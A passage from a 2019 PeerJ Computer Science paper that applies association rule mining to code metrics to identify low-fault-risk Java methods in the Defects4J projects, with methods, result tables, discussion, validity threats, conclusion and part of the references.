fault (e.g., refactorings). Due to the manual analysis, this dataset at the method level is much more precise than other datasets at the same level, such as Shippey et al. (2016) and Giger et al. (2012), which were generated from version control systems and issue trackers without further manual filtering. The authors of Just, Jalali & Ernst (2014) confirmed that they considered every bug fix within a given time span. Table 2 presents the study objects and their characteristics. We computed the metrics SLOC and #Methods for the code revision at the last bug-fix commit of each project; the numbers do not comprise sample and test code. #Faulty methods corresponds to the number of faulty methods derived from the dataset. Fault data extraction Defects4J provides for each project a set of reverse patches2, which represent bug fixes. To obtain the list of methods that were at least once faulty, we conducted the following 2 A reverse patch reverts previous changes. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 10/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ steps for each patch. First, we checked out the source code from the project repository at the original bug-fix commit and stored it as fixed version. Second, we applied the reverse patch to the fixed version to get to the code before the bug fix and stored the resulting faulty version. Next, we analyzed the two versions created for every patch. For each file that was changed between the faulty and the fixed version, we parsed the source code to identify the methods. We then mapped the code changes to the methods to determine which methods were touched in the bug fix. After that, we had the list of faulty methods. Figure 2 summarizes these steps. We inspected all 395 bug-fix patches and found that 10 method changes in the patches do not represent bug fixes. While the patches are minimal, such that they contain only bug-related changes (see “Study Objects”), these ten method changes are semantic- preserving, only necessary because of changed signatures of other methods in the patch, and therefore included in Defects4J to keep the code compilable. Figure 3 presents an example. Although these methods are part of the bug fix, they were not changed semantically and do not represent faulty methods. Therefore, we decided to remove them from the faulty methods in our analysis. The names of these ten methods are provided in the dataset to this paper (Niedermayr, Röhm & Wagner, 2019). Table 2 Study objects. Name SLOC #Methods #Faulty methods JFreeChart (Chart) 81.6k 6.8k 39 Google Closure compiler 166.7k 13.0k 148 Apache commons Lang 16.6k 2.0k 73 Apache Commons Math 9.5k 1.2k 132 Mockito 28.3k 2.5k 64 Joda Time 89.0k 10.1k 45 013b1e 6cc308 f81f3f FAULTY #1 c1e8ed FIXED #1 8ce240 CLEANED REVERSE PATCH fa30f1 Figure 2 Derivation of faulty methods. The original bug-fix commit c1e8ed to fix the faulty version f81f3f may contain unrelated changes. Defect4J provides a reverse patch, which contains only the actual fix. We applied it to the fixed version c1e8ed to get to fa30f1 We then identified methods that were touched by the patch and computed their metrics at state fa30f1. Full-size DOI: 10.7717/peerj-cs.187/fig-2 Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 11/28 http://dx.doi.org/10.7717/peerj-cs.187/fig-2 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Procedure After extracting the faulty methods from the dataset, we computed the metrics listed in “IDP Approach.” We computed them for all faulty methods at their faulty version and for all methods of the application code3 at the state of the fixed version of the last patch. We used Eclipse JDT AST (http://www.eclipse.org/jdt/) to create an AST visitor for computing the metrics. For all further processing, we used the statistical computing software R (R Core Team, 2018). To discretize the metrics M1–M5, we first computed their value distribution. Figure 4 shows that their values are not normally distributed (most values are very small). To create three classes for each of these metrics4, we sorted the metric values, and computed the values at the end of the first and at the end of the second third. We then put all methods until the last occurrence of the value at the end of the first third into class 1, all methods until the last occurrence of the value at the end of the second third into class 2, and all other methods into class 3. Table 3 presents the value ranges of the resulting classes. The classes are the same for all six projects. We then aggregated multiple faulty occurrences of the same method (this occurs if a method is changed in more than one bug-fix patch) and created a unified dataset of faulty and non-faulty methods (see “Data pre-processing”). Next, we split the dataset into a training and a test set. For RQ 1 and RQ 2, we used 10-fold cross-validation (Witten et al., 2016, Chapter 5). Using the caret package (from Jed Wing et al. (2017)), we randomly sampled the dataset of each project into ten stratified partitions of equal sizes. Each partition is used once for testing the classifier, which is trained on the remaining nine partitions. To compute the association rules for RQ 3—in which we study how generalizable the classifier is—for each project, we used the methods of the other five projects as training set for the classifier. Before computing association rules, we applied the SMOTE algorithm from the DMwR package (Torgo, 2010) with a 100% over-sampling and a 200% under-sampling rate to each training set. After that, each training set was equally balanced (50% faulty methods, 50% non-faulty methods)5. Figure 3 Example of method change without behavior modification to preserve API compatibility. The method escapeJavaScript(String) invokes escapeJavaStyleString(String, boolean, boolean). A further parameter was added to the invoked method; therefore, it was necessary to adjust the invocation in escapeJavaScript(String). For invocations with the parameter value true, the behavior does not change (Lang, patch 46, simplified). Full-size DOI: 10.7717/peerj-cs.187/fig-3 3 Code without sample and test code. 4 We did not use the ntile function to create classes, because it always generates classes of the same size, such that instances with the same value may end up in different classes (e.g., if 50% of the methods have the complexity value 1, the first 33.3% will end up in class 1, and the remaining 16.7% with the same value will end up in class 2). 5 We computed the results for the empirical study once with and once without addressing the data imbalance in the training set. The prediction perfor- mance was better when applying SMOTE, therefore, we decided to use it. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 12/28 http://www.eclipse.org/jdt/ http://dx.doi.org/10.7717/peerj-cs.187/fig-3 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ We then used the implementation of the Apriori algorithm (Agrawal & Srikant, 1994) in the arules package (Hahsler, Gruen & Hornik, 2005; Hahsler et al., 2017) to compute association rules with NotFaulty as target item (rule consequent). We set the threshold for the minimum support to 10% and the threshold for the minimum confidence to 90% (support and confidence are explained in “Association Rule Mining”). We experimented with different thresholds and these values produced good results (results for other configurations are in the dataset provided with this paper; Niedermayr, Röhm & Wagner, 2019). The minimum support avoids overly infrequent (i.e., non-generalizable) rules from being created, and the minimum confidence prevents the creation of imprecise rules. Note that no rule (with NotFaulty as rule consequent) can reach a higher support than 50% after the SMOTE pre-processing. After computing the rules, we removed redundant ones using the corresponding function from the apriori package. We then sorted the remaining rules descending by their confidence. Using these rules, we created two classifiers to identify LFR methods. They differ in the number of comprised rules. The strict classifier uses the top n rules until the share of faulty methods in all methods (of the training set) exceeds 2.5% in the LFR methods (of the training set). The more lenient classifier uses the top n rules until the share exceeds 5% in the LFR methods. (Example: We applied the top one rule to the training set, then applied the next rule, : : : , until the matched methods in the training set contained Table 3 Generated classes and their value ranges. Metric Class 1 Class 2 Class 3 SLOC [0;3] [4;8] [9;∞) Cyclomatic complexity [0;1] [2;2] [3;∞) Maximum nesting depth [0;0] [1;1] [2;∞) Maximum method chaining [0;1] [2;2] [3;∞) Unique variable identifiers [0;1] [2;3] [4;∞) Figure 4 Metrics M1–M5 are not normally distributed. (A) SLOC, (B) cyclomatic complexity, (C) maximum nesting depth, (D) maximum method chaining, and (E) unique variable identifiers. Full-size DOI: 10.7717/peerj-cs.187/fig-4 Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 13/28 http://dx.doi.org/10.7717/peerj-cs.187/fig-4 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ 2.5% out of all faults). Figure 5 presents how an increase in the number of selected rules affects the proportion of LFR methods and the share of faulty methods that they contain. For RQ 1 and RQ 2, the classifiers were computed for each fold of each project. For RQ 3, the classifiers were computed once for each project. To answer RQ 1, we used 10-fold cross-validation to evaluate the classifiers separately for each project. We computed the number and proportion of methods that were classified as “LFR” but contained a fault (≈ false positives). Furthermore, we computed precision and recall. Our main goal is to identify those methods that we can say, with high certainty, contain hardly any faults. Therefore, we consider it as more important to achieve a high precision than to predict all methods that do not contain any faults in the dataset. As the dataset is imbalanced with faulty methods in the minority, the proportion of faults in LFR methods might not be sufficient to assess the classifiers (SMOTE was applied only to the training set). Therefore, we further computed the fault-density reduction, which describes how much less likely the LFR methods contain a fault. For example, if 40% of all methods are classified as “LFR” and contain 10% of all faults, the factor is 4. It can also be read as: 40% of all methods contain only one fourth of the expected faults. We mathematically define the fault-density reduction factor based on methods as Proportion of LFR methods out of all methods Proportion of faulty LFR methods out of all faulty methods and based on SLOC as Proportion of SLOC in LFR methods out of all SLOC Proportion of faulty LFR methods out of all faulty methods : For both classifiers (strict variant with 2.5%, lenient variant with 5%), we present the metrics for each project and the resulting median. To answer RQ 2, we assessed how common methods classified as “LFR” are. For each project, we computed the absolute number of LFR methods, their proportion out of all methods, and their extent by considering their SLOC. LFR SLOC corresponds to the sum of SLOC of all LFR methods. The proportion of LFR SLOC is computed out of all SLOC of the project. 0% 20% 40% 60% 80% 0 100 Number of Rules Figure 5 Influence of the number of selected rules (Lang). The number of rules influences the — proportion of low-fault-risk (LFR) methods and the — share of faulty methods in LFR out of all faulty methods. Full-size DOI: 10.7717/peerj-cs.187/fig-5 Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 14/28 http://dx.doi.org/10.7717/peerj-cs.187/fig-5 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ To answer RQ 3, we computed the association rules for each project with the methods of the other five projects as training data. Like in RQ 1 and RQ 2, we determined the number of used top n rules with the same thresholds (2.5% and 5%). To allow a comparison with the within-project classifiers, we computed the same metrics like in RQ 1 and RQ 2. To answer RQ 4, we computed for each method the 9 code and 15 change metrics that were used in Giger et al. (2012). The metrics and their descriptions are listed in Table 4. We applied Random Forest as machine learning algorithm and configured it like in the paper of Giger et al. (2012). We computed the results for within-project predictions using 10-fold cross-validation and we further computed the results for cross-project predictions like in RQ 3. We present the same evaluation metrics as in the previous research questions. Results This section presents the results to the research questions. The data to reproduce the results is available at (Niedermayr, Röhm & Wagner, 2019). Table 4 RQ 4: Code and change metrics used in Giger et al. (2012). Metric name Description Code metrics fanIN Number of methods that reference a given method fanOUT Number of methods referenced by a given method localVar Number of local variables in the body of a method parameters Number of parameters in the declaration commentToCodeRatio Ratio of comments to source code (line-based) countPath Number of possible paths in the body of a method complexity McCabe cyclomatic complexity of a method execStmt Number of executable source code statements maxNesting Maximum nested depth of all control structures Change metrics methodHistories Number of times a method was changed authors Number of distinct authors that changed a method stmtAdded Sum of all source code statements added to a method body maxStmtAdded Maximum number of source code statements added to a method body avgStmtAdded Average number of source code statements added to a method body stmtDeleted Sum of all source code statements deleted from a method body maxStmtDeleted Maximum number of source code statements deleted from a method body avgStmtDeleted Average number of source code statements deleted from a method body churn Sum of churn (stmtAdded—stmtDeleted) maxChurn Maximum churn avgChurn Average churn decl Number of method declaration changes cond Number of condition expression changes in a method body elseAdded Number of added else-parts in a method body elseDeleted Number of deleted else-parts from a method body Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 15/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ RQ 1: What is the precision of the classifier for low-fault-risk methods? Table 5 presents the results. The methods classified to have LFR by the stricter classifier, which allows a maximum fault share of 2.5% in the LFR methods in the (balanced) training data, contain between two and eight faulty methods per project. The more lenient classifier, which allows a maximum fault share of 5%, classified between four and 15 faulty methods as LFR. The median proportion of faulty methods in LFR methods is 0.3% resp. 0.4%. The fault-density reduction factor for the stricter classifier ranges between 4.3 and 10.9 (median: 5.7) when considering methods and between 1.5 and 4.4 (median: 3.2) when considering SLOC. In the project Lang, 28.6% of all methods with 13.8% of the SLOC are classified as LFR and contain 4.1% of all faults, thus, the factor is 7.0 (SLOC-based: 3.4). The factor never falls below 1 for both classifiers. Table 6 exemplarily presents the top three rules for Lang. Methods that work with fewer than two variables and do not invoke any methods as well as short methods without arithmetic operations, cast expressions, and method invocations are highly unlikely to contain a fault. RQ 2: How large is the fraction of the code base consisting of methods classified as “low fault risk”? Table 5 presents the results. The stricter classifier classified between 16.5% and Table 5 RQ 1, RQ 2: Evaluation of within-project IDP to identify low-fault-risk (LFR) methods. Project Faults in LFR LFR methods LFR methods LFR SLOC LFR methods contain : : : % of all faults Fault-density reduction # % Prec Rec # % # % (Methods) (SLOC) Within-project IDP, 10-fold: min. support = 10%, min. confidence = 90%, rules until fault share in training set = 2.5% Chart 4 0.1% 99.9% 44.1% 2,995 43.9% 11,228 15.8% 10.3% 4.3 1.5 Closure 6 0.2% 99.8% 29.2% 3,759 28.9% 15,497 10.5% 4.1% 7.1 2.6 Lang 3 0.5% 99.5% 29.6% 576 28.6% 2,242 13.8% 4.1% 7.0 3.4 Math 2 1.1% 98.9% 18.4% 190 16.5% 570 4.8% 1.5% 10.9 3.1 Mockito 5 0.6% 99.4% 35.1% 875 34.4% 6,128 25.1% 7.8% 4.4 3.2 Time 8 0.1% 99.9% 80.4% 8,063 80.2% 62,063 78.1% 17.8% 4.5 4.4 Median 0.3% 99.7% 32.3% 31.7% 14.8% 6.0% 5.7 3.2 Within-project IDP, 10-fold: min. support = 10%, min. confidence = 90%, rules until fault share in training set = 5% Chart 4 0.1% 99.9% 44.8% 3,040 44.6% 11,563 16.3% 10.3% 4.3 1.6 Closure 15 0.3% 99.7% 41.8% 5,385 41.5% 25,981 17.6% 10.1% 4.1 1.7 Lang 6 0.7% 99.3% 45.0% 879 43.7% 3,630 22.3% 8.2% 5.3 2.7 Math 7 2.7% 97.3% 24.3% 255 22.1% 878 7.3% 5.3% 4.2 1.4 Mockito 6 0.5% 99.5% 47.8% 1,189 46.8% 8,260 33.8% 9.4% 5.0 3.6 Time 9 0.1% 99.9% 82.8% 8,298 82.5% 63,333 79.7% 20.0% 4.1 4.0 Median 0.4% 99.6% 44.9% 44.1% 20.0% 9.8% 4.3 2.2 IDP can identify methods with LFR. On average, only 0.3% of the methods classified as “LFR” by the strict classifier are faulty. The identified LFR methods are, on average, 5.7 times less likely to contain a fault than an arbitrary method in the dataset. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 16/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ 80.2% of the methods as LFR (median: 31.7%, mean: 38.8%), the more lenient classifier matched between 22.1% and 82.5% of the methods (median: 44.1%, mean: 46.9%). The median of the comprised SLOC in LFR methods is 14.8% (mean: 24.7%) respectively 20.0% (mean: 29.5%). RQ 3: Is a trained classifier for methods with low fault risk generalizable to other projects? Table 7 presents the results for the cross-project prediction with training Table 6 Top three association rules for Lang (within-project, fold 1). # Rule Support (%) Confidence (%) 1 {UniqueVariableIdentifiersLessThan2, NoMethodInvocations} ⇒ {NotFaulty} 10.98 100.00 2 {SlocLessThan4, NoMethodInvocations, NoArithmeticOperations} ⇒ {NotFaulty} 10.98 100.00 3 {SlocLessThan4, NoMethodInvocations, NoCastExpressions} ⇒ {NotFaulty} 10.60 100.00 Table 7 RQ 3: Evaluation of cross-project IDP. Project Faults in LFR LFR methods LFR methods LFR SLOC LFR methods contain : : : % of all faults Fault-density reduction # % Prec. Rec. # % # % (Methods) (SLOC) Cross-project IDP: min. support = 10%, min. confidence = 90%, rules until fault share in training set = 2.5% Chart 3 0.1% 99.9% 32.1% 2,182 32.0% 7,434 10.5% 7.7% 4.2 1.4 Closure 2 0.1% 99.9% 25.0% 3,207 24.7% 11,584 7.9% 1.4% 18.3 5.8 Lang 1 0.2% 99.8% 23.1% 449 22.3% 1,357 8.3% 1.4% 16.3 6.1 Math 8 2.9% 97.1% 26.6% 280 24.3% 1,129 9.4% 6.1% 4.0 1.6 Mockito 1 0.2% 99.8% 21.7% 539 21.2% 1,698 6.9% 1.6% 13.6 4.4 Time 1 0.1% 99.9% 18.4% 1,845 18.3% 5,807 7.3% 2.2% 8.3 3.3 Median 0.2% 99.8% 24.0% 23.3% 8.1% 1.9% 10.9 3.9 Cross-project IDP: min. support = 10%, min. confidence = 90%, rules until fault share in training set = 5% Chart 4 0.2% 99.8% 35.5% 2,411 35.4% 9,363 13.2% 10.3% 3.4 1.3 Closure 4 0.1% 99.9% 25.9% 3,327 25.6% 15,583 10.6% 2.7% 9.5 3.9 Lang 4 0.7% 99.3% 27.7% 542 26.9% 1,959 12.0% 5.5% 4.9 2.2 Math 18 5.1% 94.9% 32.9% 354 30.7% 1,634 13.7% 13.6% 2.2 1.0 Mockito 1 0.2% 99.8% 25.0% 620 24.4% 3,495 14.3% 1.6% 15.6 9.1 Time 1 0.0% 100.0% 20.0% 2,007 20.0% 7,552 9.5% 2.2% 9.0 4.3 Median 0.2% 99.8% 26.8% 26.3% 12.6% 4.1% 6.9 3.1 Using within-project IDP, on average, 32–44% of the methods, comprising about 15–20% of the SLOC, can be assigned a lower importance during testing. In the best case, when ignoring 16.5% of the methods (4.8% of the SLOC), it is still possible to catch 98.5% of the faults (Math). Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 17/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ data from the respective other projects. Compared to the results of the within-project prediction, except for Math, the number of faults in LFR methods decreased or stayed the same in all projects for both classifier variants. While the median proportion of faults in LFR methods slightly decreased, the proportion of LFR methods also decreased in all projects except Math. The median proportion of LFR methods is 23.3% (SLOC: 8.1%) for the stricter classifier and 26.3% (SLOC: 12.6%) for the more lenient classifier. The fault-density reduction improved compared to the within-project prediction for both the method and SLOC level in both classifier variants: For the stricter classifier, the median of the method-based factor is 10.9 (+5.2); the median of the SLOC-based factor is 3.9 (+0.7). Figure 6 illustrates the fault-density reduction for both within-project (RQ 1, RQ 2) and cross-project (RQ 3) prediction. RQ 4: How does the classifier perform compared to a traditional defect prediction approach? Table 8 presents the results of the within- and cross-project prediction according to the approach by Giger et al. (2012). In the within-project prediction scenario, the classifier predicts on average 99.4% of the methods to be non-faulty. As a consequence, the average recall regarding non-faulty methods reaches 99.9%. However, the number of methods that are classified as non-faulty but actually contain a fault increases by magnitudes compared to the IDP approach (i.e., precision deteriorates). For example, 77% of Closure’s faulty methods are wrongly classified as non-faulty. The median fault-density reduction is 1.6 at the method level (strict IDP: 5.7) and 1.4 when considering SLOC (strict IDP: 3.2). Consequently, methods classified by the traditional approach to have a LFR are still less likely to contain a fault than other methods, but the difference is not as high as in the IDP classifier. 0 5 10 15 chart closure lang math mockito time Fa ul t− de ns ity r ed uc tio n (m et ho ds ) Figure 6 Comparison of the IDP within-project ( 2.5%, 5.0%) with the IDP cross-project ( 2.5%, 5.0%) classifiers (method-based). The fault-density reduction expresses how much less likely a LFR method contains a fault (definition in Procedure). Higher values are better (Example: If 40% of the methods are LFR and contain 5% of all faults, the factor is 8). The dashed line is at one; no value falls below. Full-size DOI: 10.7717/peerj-cs.187/fig-6 Using cross-project IDP, on average, 23–26% of the methods, comprising about 8–13% of the SLOC, can be classified as “LFR.” The methods classified by the stricter classifier contain, on average, less than one eleventh of the expected faults. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 18/28 http://dx.doi.org/10.7717/peerj-cs.187/fig-6 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ The results in the cross-project prediction scenario are similar. In four of the six projects, the number of faults in LFR methods increased compared with the within-project prediction scenario. The fault-density reduction deteriorated to 1.2 both at the method and SLOC level (strict IDP: 10.9 resp. 3.9). For all projects, IDP outperformed the traditional approach. DISCUSSION The results of our empirical study show that only very few LFR methods actually contain a fault, and thus, they indicate that IDP can successfully identify methods that are not fault-prone. On average, 31.7% of the methods (14.8% of the SLOC) matched by the strict classifier contain only 6.0% of all faults, resulting in a considerable fault-density reduction for the matched methods. In any case, LFR methods are less fault-prone than other methods (fault-density reduction is higher than one in all projects); based on methods, LFR methods are at least twice less likely to contain a fault. For the stricter classifier, the extent of the matched methods, which could be deferred in testing, is between 5% and 78% of the SLOC of the respective project. The more lenient classifier matches more methods and SLOC at the cost of a higher fault proportion, but still achieves satisfactory fault-density reduction values. This shows that the balance between fault risk and matched extent can be influenced by the number of considered rules to reflect the priorities of a software project. Interestingly, the cross-project IDP classifier, which is trained on data from the respective other five projects, exhibits a higher precision than the within-project IDP classifier. Except for the Math project, the LFR methods contain fewer faulty methods in Table 8 RQ 4: Results of a traditional defect prediction approach. Project Faults in LFR LFR methods LFR methods LFR SLOC LFR methods contain : : : % of all faults Fault-density reduction # % Prec. Rec # % # % (Methods) (SLOC) Within-project defect prediction: traditional approach used in Giger et al. (2012) Chart 36 0.5% 99.5% 99.9% 6,785 99.9% 70,457 99.6% 92.3% 1.1 1.1 Closure 114 0.9% 99.1% 99.9% 12,862 99.6% 142,518 97.6% 77.0% 1.3 1.3 Lang 36 1.9% 98.1% 99.5% 1,905 97.6% 14,462 91.2% 49.3% 2.0 1.9 Math 62 6.4% 93.6% 98.4% 967 91.9% 7,234 66.5% 47.0% 2.0 1.4 Mockito 46 1.9% 98.1% 99.8% 2,481 99.1% 24,232 99.5% 71.9% 1.4 1.4 Time 26 0.3% 99.7% 100.0% 9,995 99.8% 78,809 99.8% 57.8% 1.7 1.7 Median 1.4% 98.6% 99.9% 99.4% 98.6% 64.8% 1.6 1.4 Cross-project defect prediction: traditional approach used in Giger et al. (2012) Chart 32 0.5% 99.5% 99.2% 6,755 99.1% 68,214 96.3% 82.1% 1.2 1.2 Closure 82 0.6% 99.4% 99.5% 12,859 99.0% 141,322 96.0% 55.4% 1.8 1.7 Lang 52 2.6% 97.4% 99.9% 1,990 98.9% 15,085 92.8% 71.2% 1.4 1.3 Math 103 9.2% 90.8% 99.8% 1,123 97.3% 9,512 79.5% 78.0% 1.2 1.0 Mockito 58 2.3% 97.7% 100.0% 2,534 99.8% 24,420 99.8% 90.6% 1.1 1.1 Time 39 0.4% 99.6% 100.0% 10,050 99.9% 79,191 99.7% 86.7% 1.2 1.2 Median 1.5% 98.5% 99.9% 99.0% 96.1% 80.0% 1.2 1.2 Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 19/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ the cross-project prediction scenario. This is in line with the method-based fault- density reduction factor of the strict classifier, which is in four of six cases better in the cross-project scenario (SLOC-based: three of six cases). However, the proportion of matched methods decreased compared to the within-project prediction in most projects. Accordingly, the cross-project results suggest that a larger, more diversified training set identifies LFR methods more conservatively, resulting in a higher precision and lower matching extent. Math is the only project in which IDP within-project prediction outperformed IDP cross-project prediction. This project contains many methods with mathematical computations expressed by arithmetic operations, which are often wrapped in loops or conditions; most of the faults are located in these methods. Therefore, the within-project classifiers used few, very precise rules for the identification of LFR methods. To sum up, our results show that the IDP approach can be used to identify methods that are, due to the “triviality” of their code, less likely to contain any faults. Hence, these methods require less focus during quality-assurance activities. Depending on the criticality of the system and the risk one is willing to take, the development of tests for these methods can be deferred or even omitted in case of insufficient available test resources. The results suggest that IDP is also applicable in cross-project prediction scenarios, indicating that characteristics of LFR methods differ less between projects than characteristics of faulty methods do. Therefore, IDP can be used in (new) projects with no (precise) historical fault data to prioritize the code to be tested. Limitations A limitation of IDP is that even LFR methods can contain faults. An inspection of faulty methods incorrectly classified to have a LFR showed that some faults were fixed by only adding further statements (e.g., to handle special cases). This means that a method can be faulty even if the existing code as such is not faulty (due to missing code). Further imaginable examples for faulty LFR methods are simple getters that return the wrong variable, or empty methods that are unintentionally empty. Therefore, while these methods are much less fault-prone, it cannot be assumed that they never contain any fault. Consequently, excluding LFR methods from testing and other QA activities carries a risk that needs to be kept in mind. Relation to defect prediction As discussed in detail in “Introduction,” IDP presents another view on defect prediction. The focus of IDP on LFR methods requires an optimization toward precision, so that hardly any faulty methods are erroneously classified as trivial. The comparison with a traditional defect prediction approach showed that IDP classified much fewer methods as trivial. However, methods classified by IDP as trivial contain far fewer faulty methods, that is, IDP achieves a higher precision. Consequently, the identified trivial methods can be deferred or even excluded from quality-assurance activities. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 20/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Threats to validity Next, we discuss the threats to internal and external validity. Threats to internal validity The learning and evaluation was performed on information extracted from Defects4J (Just, Jalali & Ernst, 2014). Therefore, the quality of our data depends on the quality of Defects4J. Common problems for defect datasets created by analyzing changes in commits that reference a bug ticket in an issue tracking system are as follows. First, commits that fix a fault but do not reference a ticket in the commit message cannot be detected (Bachmann et al., 2010). Consequently, the set of commits that reference a bug fix may not be a fair representation of all faults (Bird et al., 2009; D’Ambros, Lanza & Robbes, 2012; Giger et al., 2012). Second, bug tickets in the issue tracker may not always represent faults and vice versa. Herzig, Just & Zeller (2013) pointed out that a significant amount of tickets in the issue trackers of open-source projects is misclassified. Therefore, it is possible that not all bug-fix commits were spotted. Third, methods may contain faults that have not been detected or fixed yet. In general, it is not possible to prove that a method does not contain any faults. Fourth, a commit may contain changes (such as refactorings) that are not related to the bug fix, but this problem does not affect the Defects4J dataset due to the authors’ manual inspection. These threats are present in nearly all defect prediction studies, especially in those operating at the method level. Defect prediction models were found to be resistant to such kind of noise to a certain extent (Kim et al., 2011). Defects4J contains only faults that are reproducible and can be precisely mapped to methods; therefore, faulty methods may be under-approximated. In contrast, other datasets created without manual post-processing tend to over-approximate faults. To mitigate this threat, we replicated our IDP evaluation with two study objects used in Giger et al. (2012). The observed results were similar to our study. Threats to external validity The empirical study was performed with six mature open-source projects written in Java. The projects are libraries and their results may not be applicable to other application types, for example, large industrial systems with user interfaces. The results may also not be transferable to projects of other languages, for the following reasons: First, Java is a strongly typed language that provides type safety. It is unclear if the IDP approach works for languages without type safety, because it could be that even simple methods in such languages exhibit a considerable amount of faults. Second, in case the approach as such is applicable to other languages, the collected metrics and the LFR classifier need to be validated and adjusted. Other languages may use language constructs in a different way or use constructs that do not exist in Java. For example, a classifier for the C language should take constructs such as GOTOs and the use of pointer arithmetic into consideration. Furthermore, the projects in the dataset (published in 2014) did not contain code with lambda expressions introduced in Java 8 (http://www.oracle.com/technetwork/articles/java/architect-lambdas-part1-2080972.html). Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 21/28 http://www.oracle.com/technetwork/articles/java/architect-lambdas-part1-2080972.html http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Therefore, in newer projects that make use of lambda expressions, the presence of lambdas should be taken into consideration when classifying methods. Consequently, further studies are necessary to determine whether the results are generalizable. Like in most defect prediction studies, we treated all faults as equal and did not consider their severity. According to Ostrand, Weyuker & Bell (2004), the severity of bug tickets is often highly subjective. In reality, not all faults have the same importance, because some cause higher failure follow-up costs than others. CONCLUSION Developer teams often face the problem of scarce test resources and need therefore to prioritize their testing efforts (e.g., when writing new automated unit tests). Defect prediction can support developers in this activity. In this paper, we propose an inverse view on defect prediction (IDP) to identify methods that are so “trivial” that they contain hardly any faults. We study how unerringly such LFR methods can be identified, how common they are, and whether the proposed approach is applicable for cross- project predictions. We show that IDP using association rule mining on code metrics can successfully identify LFR methods. The identified methods contain considerably fewer faults than the average code and can provide a savings potential for QA activities. Depending on the parameters, a lower priority for QA can be assigned on average to 31.7% resp. 44.1% of the methods, amounting to 14.8% resp. 20.0% of the SLOC. While cross-project defect prediction is a challenging task (He et al., 2012; Zimmermann et al., 2009), our results suggest that the IDP approach can be applied in a cross-project prediction scenario at the method level. In other words, an IDP classifier trained on one or more (Java open-source) projects can successfully identify LFR methods in other Java projects for which no—or no precise—fault data exists. For future work, we want to replicate this study with closed-source projects, projects of other application types, and projects in other programming languages. It is also of interest to investigate which metrics and classifiers are most effective for the IDP purpose and whether they differ from the ones used in traditional defect prediction. Moreover, we plan to study whether code coverage of LFR methods differs from code coverage of other methods. If guidelines to meet a certain code coverage level are set by the management, unmotivated testers may add tests for LFR methods first because it might be easier to write tests for those methods. Consequently, more complex methods with a higher fault risk may remain untested once the target coverage is achieved. Therefore, we want to investigate whether this is a problem in industry and whether it can be addressed with an adjusted code-coverage computation, which takes LFR methods into account. ACKNOWLEDGEMENTS We thank Nils Göde, Florian Deißenböck, and the anonymous reviewers for their valuable feedback. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 22/28 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded by the Institute of Software Technology of the University of Stuttgart and the German Federal Ministry of Education and Research (BMBF), grant “SOFIE, 01IS18012A.” The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Institute of Software Technology of the University of Stuttgart. German Federal Ministry of Education and Research (BMBF): SOFIE, 01IS18012A. Competing Interests Rainer Niedermayr and Tobias Röhm are employees of CQSE GmbH. The responsibility for this article lies with the authors. Author Contributions � Rainer Niedermayr conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Tobias Röhm conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. � Stefan Wagner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Niedermayr, Rainer (2019): Dataset: Too Trivial To Test? figshare. Fileset. DOI 10.6084/m9.figshare.6194171.v1. REFERENCES Agrawal R, Imieli�nski T, Swami A. 1993. Mining association rules between sets of items in large databases. ACM SIGMOD Record 22(2):207–216 DOI 10.1145/170036.170072. Agrawal R, Srikant R. 1994. Fast algorithms for mining association rules. In: Proceedings of 20th International Conference on Very Large Data Bases (VLDB’94). San Francisco: Morgan Kaufmann, Vol. 1215, 487–499. Bacchelli A, D’Ambros M, Lanza M. 2010. Are popular classes more defect prone? In: Proceedings of 13th International Conference on Fundamental Approaches to Software Engineering (FASE’10). Berlin, Heidelberg: Springer, Vol. 6013, 59–73 DOI 10.1007/978-3-642-12029-9_5. Bachmann A, Bird C, Rahman F, Devanbu P, Bernstein A. 2010. The missing links: bugs and bug-fix commits. In: Proceedings of 18th International Symposium on Foundations of Software Engineering (FSE’10). New York: ACM, 97–106. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 23/28 https://doi.org/10.6084/m9.figshare.6194171.v1 http://dx.doi.org/10.1145/170036.170072 http://dx.doi.org/10.1007/978-3-642-12029-9_5 http://dx.doi.org/10.7717/peerj-cs.187 